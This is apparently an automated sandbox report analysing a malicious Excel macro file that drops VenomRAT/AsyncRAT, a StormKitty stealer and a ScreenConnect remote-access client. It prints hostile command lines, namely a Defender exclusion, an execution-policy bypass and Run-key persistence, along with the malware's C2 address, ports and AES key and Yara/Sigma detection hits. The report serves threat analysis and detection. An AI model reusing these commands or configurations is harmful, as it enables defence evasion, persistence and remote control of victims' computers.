Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Document25.xlsm

Overview

General Information

Sample name:Document25.xlsm
Analysis ID:1637073
MD5:7ac07195f03358c51fbb2e422a8b5452
SHA1:a4e0c6f0797f655c26d920cf8474e21815435455
SHA256:5d12f3d6b8c0418215b29ad3afb0a3448966a6eaeb02dca2e89d6bff5d8e2570
Tags:xlsmuser-cocaman
Infos:

Detection

ScreenConnect Tool, AsyncRAT, StormKitty, VenomRAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Suricata IDS alerts for network traffic
Yara detected AsyncRAT
Yara detected StormKitty Stealer
Yara detected VenomRAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected landing page (webpage, office document or email)
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to hide user accounts
Contains functionality to log keystrokes (.Net Source)
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document exploit detected (process start blacklist hit)
Enables network access during safeboot for specific services
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Modifies security policies related information
Office process queries suspicious COM object (likely to drop second stage)
Possible COM Object hijacking
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sample uses string decryption to hide its real strings
Sigma detected: Explorer NOUACCHECK Flag
Sigma detected: Legitimate Application Dropped Archive
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Excel Network Connections
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Office Outbound Connections
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara detected ScreenConnect Tool
Yara signature match

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6328 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • 7z.exe (PID: 5360 cmdline: "C:\Program Files\7-Zip\7z.exe" x -p123456 -y -o"C:\Users\user\AppData\Local\Temp\invoice_temp\" "C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.zip" MD5: 9A1DD1D96481D61934DCC2D568971D06)
      • conhost.exe (PID: 6088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • regsvr32.exe (PID: 6100 cmdline: "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
    • newpoveno.exe (PID: 5140 cmdline: "C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe" MD5: 41C2401A4ECF9C80796E534D388E56CD)
      • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5932 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7248 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • AddInProcess32.exe (PID: 6368 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
        • cmd.exe (PID: 6068 cmdline: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6296 cmdline: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • Document.exe (PID: 6848 cmdline: "C:\Users\user\AppData\Local\Temp\Document.exe" MD5: F9500A55F06CD124D7406476579A5F7C)
              • msiexec.exe (PID: 1120 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\ea32d473b92f819d\ScreenConnect.ClientSetup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • explorer.exe (PID: 5240 cmdline: "C:\Windows\explorer.exe" MD5: 662F4F92FDE3557E86D110526BB578D5)
        • cvtres.exe (PID: 2748 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 176.65.142.74 4448 HVNC_MUTEX MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
          • conhost.exe (PID: 2852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chrome.exe (PID: 7228 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\VenHide" --no-sandbox --allow-no-sandbox-job --disable-accelerated-layers --disable-accelerated-plugins --disable-audio --disable-gpu --disable-d3d11 --disable-accelerated-2d-canvas --disable-deadline-scheduling --disable-ui-deadline-scheduling --aura-no-shadows --mute-audio MD5: E81F54E6C1129887AEA47E7D092680BF)
            • chrome.exe (PID: 5516 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\VenHide" --no-pre-read-main-dll --field-trial-handle=2120,i,14894441107756567341,7342821476491626957,262144 --variations-seed-version=20231002-080120.576000 --mojo-platform-channel-handle=2256 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • sppsvc.exe (PID: 6996 cmdline: C:\Windows\system32\sppsvc.exe MD5: 320823F03672CEB82CC3A169989ABD12)
  • svchost.exe (PID: 656 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 3064 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6808 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 6976 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 6028 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 3528 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 1432 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 7980 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7328 cmdline: "C:\Windows\system32\cmd.exe" /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\newpoveno.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • newpoveno.exe (PID: 7468 cmdline: "C:\Users\user\SystemRootDoc\newpoveno.exe" MD5: 41C2401A4ECF9C80796E534D388E56CD)
      • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AddInProcess32.exe (PID: 7548 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cmd.exe (PID: 7672 cmdline: "C:\Windows\system32\cmd.exe" /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\newpoveno.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • newpoveno.exe (PID: 7724 cmdline: "C:\Users\user\SystemRootDoc\newpoveno.exe" MD5: 41C2401A4ECF9C80796E534D388E56CD)
      • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AddInProcess32.exe (PID: 7792 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • msiexec.exe (PID: 7884 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7608 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 5F31D207096A70303A87FAA569F8958D C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 5704 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIBE65.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4046546 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 2248 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 9C864324F3ACEEC3843B308126110901 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 3172 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 56F78CA946A322F1A8337330F29E556C E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 8000 cmdline: "C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-pi5ke2-relay.screenconnect.com&p=443&s=4e491804-ebd1-4ec1-a81d-3bf98af2b16f&k=BgIAAACkAABSU0ExAAgAAAEAAQDV5xr%2f63eUw3yWSiptbv5fNcp0K%2fm1HgCzug%2fuXVLaE7zXcJaALS5LoNDk%2fCtX1DhHiK7zhI%2bKLvNYucmCVNYhfawyE7GKXdStFwcdW3bdG7Bl1wsDbR9V3DCQtHu0RCULGn2CLbfaMYcxT7HUC8TrGSemBF6idtbA81QikNAwKvc0mAXjUuHQgFKNxH34ev1K7FFVTHQQmAfMWifAR3wQA3I8ZCb2o4gfszrm68%2fq2clfPySQ9B17enljE%2b7B1y8UqGY%2brDfKadO%2fAISlRMCNIopaBIw62z2RT8UYqLCAsO4P%2bQQU%2fFWzzNBS%2bocDYGtZaBBqN9vqtk0Ur5xxoDqt" MD5: 75B21D04C69128A7230A0998086B61AA)
    • ScreenConnect.WindowsClient.exe (PID: 4276 cmdline: "C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exe" "RunRole" "94bdae91-aed5-45b2-b496-05a680474da1" "User" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
  • explorer.exe (PID: 2780 cmdline: C:\Windows\explorer.exe /NoUACCheck MD5: 662F4F92FDE3557E86D110526BB578D5)
  • explorer.exe (PID: 3044 cmdline: C:\Windows\explorer.exe /NoUACCheck MD5: 662F4F92FDE3557E86D110526BB578D5)
  • svchost.exe (PID: 916 cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7624 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
Cameleon, StormKittyPWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Malware Configuration

Threatname: VenomRAT

{"Host": ["176.65.142.74"], "Port": ["4449", "4448"], "Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.3", "Install": "false", "Mutex": "daqyvsbasipyrpcr", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "Server Signature": "d+a4ycumaeWIM9YxlrFIdWs7CTkTxKdsBYh1mZeXMQ4o/CbIHyvL91xcA8PbMAiJqqCtkM59EmwfO4NFhG7G7IIF0QmqMnS+5KOeDimqGHuuXsBHBuWY5Zix0FWkhiFiwfy3w7kXQW8UC3JzN7wC8CGnoIBfAYhd9GU5l95HDAk="}

Threatname: AsyncRAT

{"Server": "176.65.142.74", "Ports": "4449,4448", "Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.3", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "oyLTzCYJW2NXzjfLQfeGJ9SMmgKS3lF7", "Mutex": "daqyvsbasipyrpcr", "Certificate": "MIICOTCCAaKgAwIBAgIVAPyfwFFMs6hxoSr1U5gHJmBruaj1MA0GCSqGSIb3DQEBDQUAMGoxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEfMB0GA1UECgwWVmVub21SQVQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDgxNDA5NDEwOVoXDTMzMDUyMzA5NDEwOVowEzERMA8GA1UEAwwIVmVub21SQVQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJMk9aXYluIabmb8kV7b5XTizjGIK0IH5qWN260bNCSIKNt2zQOLq6jGfh+VvAA/ddzW3TGyxBUMbya8CatcEPCCiU4SEc8xjyE/n8+O0uya4p8g4ooTRIrNFHrRVySKchyTv32rce963WWvmj+qDvwUHHkEY+Dsjf46C40vWLDxAgMBAAGjMjAwMB0GA1UdDgQWBBQsonRhlv8vx7fdxs/nJE8fsLDixjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4GBAAVFFK4iQZ7aqDrUwV6nj3VoXFOcHVo+g9p9ikiXT8DjC2iQioCrN3cN4+w7YOkjPDL+fP3A7v+EI9z1lwEHgAqFPY7tF7sT9JEFtq/+XPM9bgDZnh4o1EWLq7Zdm66whSYsGIPR8wJdtjw6U396lrRHe6ODtIGB/JXyYYIdaVrz", "ServerSignature": "d+a4ycumaeWIM9YxlrFIdWs7CTkTxKdsBYh1mZeXMQ4o/CbIHyvL91xcA8PbMAiJqqCtkM59EmwfO4NFhG7G7IIF0QmqMnS+5KOeDimqGHuuXsBHBuWY5Zix0FWkhiFiwfy3w7kXQW8UC3JzN7wC8CGnoIBfAYhd9GU5l95HDAk=", "BDOS": "null", "External_config_on_Pastebin": "false"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Windows\Temp\~DFADB967A848420FAD.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\Windows\Installer\inprogressinstallinfo.ipiJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\Config.Msi\3dc3b5.rbsJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        C:\Users\user\SystemRootDoc\nasrallah_x86.dllJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
          C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dllJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
            Click to see the 8 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000018.00000002.1404363596.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
              0000000C.00000002.6331801761.0000000003404000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_StormKittyYara detected StormKitty StealerJoe Security
                0000002E.00000000.4279525006.0000000000BB2000.00000002.00000001.01000000.0000001C.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  0000000C.00000002.6331801761.0000000003093000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_StormKittyYara detected StormKitty StealerJoe Security
                    0000000C.00000002.6331801761.0000000003093000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 22 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      37.2.Document.exe.5790000.11.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                        27.2.newpoveno.exe.24b5482b0a0.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                          27.2.newpoveno.exe.24b5482b0a0.0.unpackrat_win_dcrat_qwqdanchunFind DcRAT samples (qwqdanchun) based on specific stringsSekoia.io
                          • 0xd536:$str03: Po_ng
                          • 0xc13c:$str04: Pac_ket
                          • 0xdcdc:$str05: Perfor_mance
                          • 0xdd20:$str06: Install_ed
                          • 0x86cd:$str07: get_IsConnected
                          • 0x99c8:$str08: get_ActivatePo_ng
                          • 0xaa97:$str09: isVM_by_wim_temper
                          • 0xd552:$str10: save_Plugin
                          • 0xd800:$str11: timeout 3 > NUL
                          • 0xd896:$str12: ProcessHacker.exe
                          • 0xda88:$str13: Select * from Win32_CacheMemory
                          27.2.newpoveno.exe.24b5482b0a0.0.unpackINDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDeviceDetects executables attemping to enumerate video devices using WMIditekSHen
                          • 0xda88:$q1: Select * from Win32_CacheMemory
                          • 0xdac8:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86}
                          • 0xdb16:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86}
                          • 0xdb64:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
                          22.2.newpoveno.exe.143e7c2b0a0.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                            Click to see the 24 entries

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Explorer NOUACCHECK Flag
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\explorer.exe /NoUACCheck, CommandLine: C:\Windows\explorer.exe /NoUACCheck, CommandLine|base64offset|contains: y, Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1080, ProcessCommandLine: C:\Windows\explorer.exe /NoUACCheck, ProcessId: 2780, ProcessName: explorer.exe
                            Sigma detected: Legitimate Application Dropped Archive
                            Source: File createdAuthor: frack113, Florian Roth: Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ProcessId: 6328, TargetFilename: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.zip
                            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe", ParentImage: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe, ParentProcessId: 5140, ParentProcessName: newpoveno.exe, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\SystemRootDoc' -Force", ProcessId: 5932, ProcessName: powershell.exe
                            Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
                            Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe", CommandLine: "C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 6328, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe", ProcessId: 5140, ProcessName: newpoveno.exe
                            Sigma detected: Suspicious Microsoft Office Child Process
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll", CommandLine: "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 6328, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll", ProcessId: 6100, ProcessName: regsvr32.exe
                            Sigma detected: Suspicious Script Execution From Temp Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6068, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\Document.exe"' , ProcessId: 6296, ProcessName: powershell.exe
                            Sigma detected: CurrentVersion Autorun Keys Modification
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd.exe /C start "" /D "C:\Users\user\SystemRootDoc" "C:\Users\user\SystemRootDoc\newpoveno.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exe, ProcessId: 5140, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\newpoveno
                            Sigma detected: Excel Network Connections
                            Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DesusertionIp: 149.137.136.16, DesusertionIsIpv6: false, DesusertionPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6328, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49693
                            Sigma detected: Powershell Defender Exclusion
